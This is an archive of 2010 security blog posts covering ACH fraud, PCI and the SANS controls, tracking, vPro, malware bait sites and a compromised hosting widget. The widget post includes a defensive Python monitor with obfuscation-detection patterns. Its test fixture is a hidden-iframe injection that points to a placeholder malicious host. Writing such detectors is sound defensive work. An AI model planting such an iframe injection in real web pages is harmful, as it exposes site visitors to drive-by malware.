22. August 2010 · Automated Clearing House (ACH) fraud increasing · Categories: Breach

CSOOnline has a good article on ACH (Automated Clearing House) fraud:

Fraud involving the Automated Clearing House (ACH) Network, which is used by financial institutions to handle direct deposits, checks, bill payments and cash transfers between businesses and individuals, is becoming an increasingly popular way for hackers to siphon money out of the bank accounts of unsuspecting victims.

Fraudsters only need two pieces of information to pull off ACH fraud: a checking account number and a bank routing number. They typically obtain the information with a targeted phishing email that tricks the victim into running malicious software, which then allows the criminals to install keylogging software and steal bank account passwords.

In order to reduce the risk of this type of exploit, we recommend using a bootable, secure “Trusted Client” on an encrypted USB stick from Becrypt.

22. August 2010 · A framework to replace PCI? · Categories: PCI Compliance, SANS 20 Critical Controls

There has been much commentary this past week about the limited enhancements in the upcoming PCI-DSS 2.0 framework. Martin McKeay wrote a post, How would I write a framework to replace PCI? where he talks about three key principles: (1) Everything flows from policy, (2) Keep it simple, and (3) Concentrate on results, not technologies.

I see it differently. The key principles of the SANS Twenty Critical Security Controls for Effective Cyber Defense make more sense and provide the basis for the Cymbel Approach:

  • Offense must inform defense – knowledge of actual attacks that have compromised systems provides an essential foundation on which to construct effective defenses.
  • Work from a prioritized baseline of information security measures and controls.
  • Most controls must be automated – there is no way for an organization to cost-effectively defend itself with manual controls.
  • Measure the effectiveness of controls – automated techniques, where possible, should be used to measure the effectiveness of deployed controls.

Furthermore, regarding policies – you cannot start the process with policies without establishing context first. Therefore we start our processes with Visibility. You can read more about this on the Cymbel Services page.

22. August 2010 · Marketers “spying” on Internet users · Categories: Privacy

The Wall St. Journal (via The New School of Information Security blog) has a very nice interactive tool, What They Know, for exploring the tracking files used by the 50 most popular U.S. websites and WSJ.com.

Is this spying? To what degree can you “opt out” of these tracking files? It’s not easy for the average web user, but doable. On the other hand, content publishers have a right to monetize their content via advertising and other indirect methods considering they cannot get people to pay directly.

22. August 2010 · Intel, McAfee, and vPro · Categories: Security Management

How many people remember Intel’s vPro? Do you know if your PC supports vPro? Do you care? It was announced by Intel at least six years ago.

As Intel says on its vPro home page:

Notebook and desktop PCs with Intel® vPro™ technology enable IT to take advantage of hardware-assisted security and manageability capabilities that enhance their ability to maintain, manage, and protect their business PCs. And with the latest IT management consoles from Independent Software Vendors (ISVs) with native Intel vPro technology support, IT can now take advantage of enhanced features to manage notebooks over a wired or corporate wireless network – or even outside the corporate firewall through a wired LAN connection.

PCs with Intel vPro technology integrate robust hardware-based security and enhanced maintenance and management capabilities that work seamlessly with ISV consoles. Because these capabilities are built into the hardware, Intel vPro technology provides IT with the industry’s first solution for OS-absent manageability and down-the-wire security even when the PC is off, the OS is unresponsive, or software agents are disabled.

While vPro looks intriguing, it does not appear to me that ISVs really embraced it. Perhaps one of the reasons for Intel acquiring McAfee was it felt it had to force the issue. The Microsoft approach of “loose” integration was not working and Intel decided to place a bet on the Apple strategy of “tight” integration.
20. August 2010 · Cameron Diaz tops malware bait list · Categories: Malware

McAfee (via Network World) just updated its “malware bait list” and Cameron Diaz came in number one.

Most anti-malware vendors, including McAfee, offer a service that flags risky sites right in the search results, helping you avoid malware-laden web pages before you click.

This is just another example of the “inside-out” attack style which, while rather random, is still a major risk considering that the bad guys watch for popular search terms and build sites to bait people.

19. August 2010 · Internet Explorer 6 still represents more than 16% of web traffic · Categories: Uncategorized

I was reviewing Zscaler’s State of the Web – Q2 2010 and was surprised to learn that 16% of the web traffic Zscaler sees still comes from Internet Explorer 6! Since Zscaler can be configured to block the use of IE 6, my guess is that IE 6 usage in the general population is even higher.

There is good news though – the trend for IE 6 and IE 7 is down and IE 8 is up, but IE 7 is still the most used browser by far at 25%. Firefox is second at 10%.

16. August 2010 · Is there a Facebook “Dislike” button? · Categories: Malware

Apparently, there ought to be. Sophos’ Graham Cluley has a post about the virally spreading malware, Facebook Dislike button. While Facebook has a legitimate “Like” button, the “Dislike” button is malware.

16. August 2010 · Malware widget infects 500,000 to 5 million sites · Categories: Malware

Both Brian Krebs and Andy Greenberg (Forbes) are reporting that Network Solutions’ “parked” domains (registered sites still showing the default page, which have never been updated by their owners), numbering between 500,000 and 5 million, have been infected through a compromised widget from GrowSmartBusiness.com.

By compromising GrowSmartBusiness.com, the attackers were then able to compromise the widgets deployed on the third party sites controlled by Network Solutions. While a widget gives a company tremendous leverage, so too it gives attackers leverage.

From a site owner’s perspective, no matter how rigorous you are with the security of your own site, you also must monitor all third party software you allow on your site, such as third party widgets and advertising networks.
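One way a site owner can put that monitoring into practice, as an added example that is not from the original post or from Network Solutions: snapshot each approved third-party widget, then re-check it for content changes, for script or iframe sources outside an allowlist, and for decode-and-execute patterns. The widget URL, the allowed hosts, and the sample widget bodies are all constructed for this example.

```python
import hashlib
import re
from typing import Dict, List

# Example widget URL and allowlist; both are assumptions for this example,
# not values from the original post or from any real vendor.
WIDGET_URL = "//widgets.example-vendor.test/gsb.js"
ALLOWED_HOSTS = {"widgets.example-vendor.test", "cdn.example-vendor.test"}

# Host part of any src= on a <script> or <iframe> the widget emits.
REMOTE_SRC = re.compile(
    r"""<(?:script|iframe)\b[^>]*\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""",
    re.IGNORECASE,
)
# Secondary signal: decode-then-execute chains typical of injected payloads.
OBFUSCATION = re.compile(
    r"\b(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)\b",
    re.IGNORECASE,
)

def sha256_hex(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()

def review_widget(url: str, body: bytes, baseline: Dict[str, str]) -> dict:
    """Compare a freshly fetched widget body with the hash recorded when the
    widget was approved. The baseline must come from a copy you actually
    reviewed; a hash of an already-compromised widget proves nothing."""
    text = body.decode("utf-8", errors="replace")
    hosts = {h.lower() for h in REMOTE_SRC.findall(text)}
    changed = baseline.get(url) != sha256_hex(body)
    unknown: List[str] = sorted(hosts - ALLOWED_HOSTS)
    obfuscated = OBFUSCATION.search(text) is not None
    if unknown or obfuscated:
        severity = "high"      # new third-party host or obfuscated code: investigate as a likely injection
    elif changed:
        severity = "review"    # vendor pushed an update: re-approve it before trusting it
    else:
        severity = "none"
    return {"url": url, "changed": changed, "unknown_hosts": unknown,
            "obfuscated": obfuscated, "severity": severity}

# Constructed sample widget bodies (not real widget code).
CLEAN = b"document.write('<script src=\"//cdn.example-vendor.test/gsb.js\"></script>');"
TAMPERED = CLEAN + (b"\ndocument.write('<iframe src=\"http://malicious-placeholder.test/in.php\""
                    b" style=\"display:none\"></iframe>');")
BASELINE = {WIDGET_URL: sha256_hex(CLEAN)}
```

Run `review_widget(WIDGET_URL, body, BASELINE)` on each scheduled fetch; a "review" result means the vendor changed something, and "high" means the change brought in a host or code pattern you never approved.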

From a corporate security perspective, URL filtering by itself provides no security. You may use URL filtering to control internet use, but that’s it. You must check all components of every web page being downloaded by every user with web access, all the time, whether the user is on your site or remote.

Finally, if you have users performing high risk transactions or processes, and those users also can browse the web, you must assume that their computers are compromised.

15. August 2010 · Time for security protection on smartphones? · Categories: Malware

Critical vulnerabilities appearing in both iPhones and Android phones point to the need for third party security products.

Apparently Juniper and McAfee think so. Juniper recently announced that it was acquiring SMobile Systems for $70 million. McAfee acquired TenCube. Another product in this space is Lookout.

Finally, which operating system do you think is more secure? Do you prefer closed vs. open source? Here is a recent article from Network World discussing this issue.

15. August 2010 · Taxonomy of Social Networking Data · Categories: Privacy

Bruce Schneier recently blogged about his A Taxonomy of Social Networking Data essay in the IEEE Security & Privacy magazine. There are six categories of data: Service, Disclosed, Entrusted, Incidental, Behavioral, and Derived.

It’s also clear that users should have different rights with respect to each data type. We should be allowed to export, change, and delete disclosed data, even if the social networking sites don’t want us to. It’s less clear what rights we have for entrusted data — and far less clear for incidental data. If you post pictures from a party with me in them, can I demand you remove those pictures — or at least blur out my face? (Go look up the conviction of three Google executives in Italian court over a YouTube video.) And what about behavioral data? It’s frequently a critical part of a social networking site’s business model. We often don’t mind if a site uses it to target advertisements, but are less sanguine when it sells data to third parties.